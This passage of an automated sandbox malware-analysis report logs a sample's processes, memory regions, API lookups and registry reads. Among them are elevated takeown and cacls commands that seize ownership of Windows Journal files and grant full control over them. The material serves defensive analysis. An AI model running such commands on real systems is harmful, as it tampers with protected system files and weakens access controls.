| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:47:59 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #145: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #145 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "ImagingDevices.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x808 |
| Parent PID | 0xf0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BC4
0x
DAC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000520000 | 0x00520000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x0052ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x00533fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00541fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00543fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00563fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x007a0000 | 0x0085dfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04c50000 | 0x04f86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f280000 | 0x7f280000 | 0x7f37ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f380000 | 0x7f380000 | 0x7f3a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3a4000 | 0x7f3a4000 | 0x7f3a4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3a9000 | 0x7f3a9000 | 0x7f3abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ac000 | 0x7f3ac000 | 0x7f3acfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ad000 | 0x7f3ad000 | 0x7f3affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 72, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x42c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #146: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #146 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x824 |
| Parent PID | 0x76c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2FC
0x
A90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x0479ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x047bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047a0000 | 0x047a0000 | 0x047affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000047b0000 | 0x047b0000 | 0x047b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047c0000 | 0x047c0000 | 0x047c1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x047c0000 | 0x047c4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000047d0000 | 0x047d0000 | 0x047e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000047f0000 | 0x047f0000 | 0x0482ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004830000 | 0x04830000 | 0x0486ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004870000 | 0x04870000 | 0x04873fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004880000 | 0x04880000 | 0x04880fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x04891fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x048dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x048e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04900000 | 0x04929fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04900fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004930000 | 0x04930000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04a30000 | 0x04aedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cb0000 | 0x04cb0000 | 0x04e37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e40000 | 0x04e40000 | 0x04fc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004fd0000 | 0x04fd0000 | 0x063cffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x063d0000 | 0x06706fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f590000 | 0x7f590000 | 0x7f68ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f690000 | 0x7f690000 | 0x7f6b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6b8000 | 0x7f6b8000 | 0x7f6bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bb000 | 0x7f6bb000 | 0x7f6bbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bc000 | 0x7f6bc000 | 0x7f6bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bd000 | 0x7f6bd000 | 0x7f6bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #147: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #147 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:52, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcec |
| Parent PID | 0x57c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B5C
0x
FD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000590000 | 0x00590000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0059ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x00663fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x00670fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x00681fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00690000 | 0x00691fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006d0000 | 0x0078dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04cf0000 | 0x05026fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
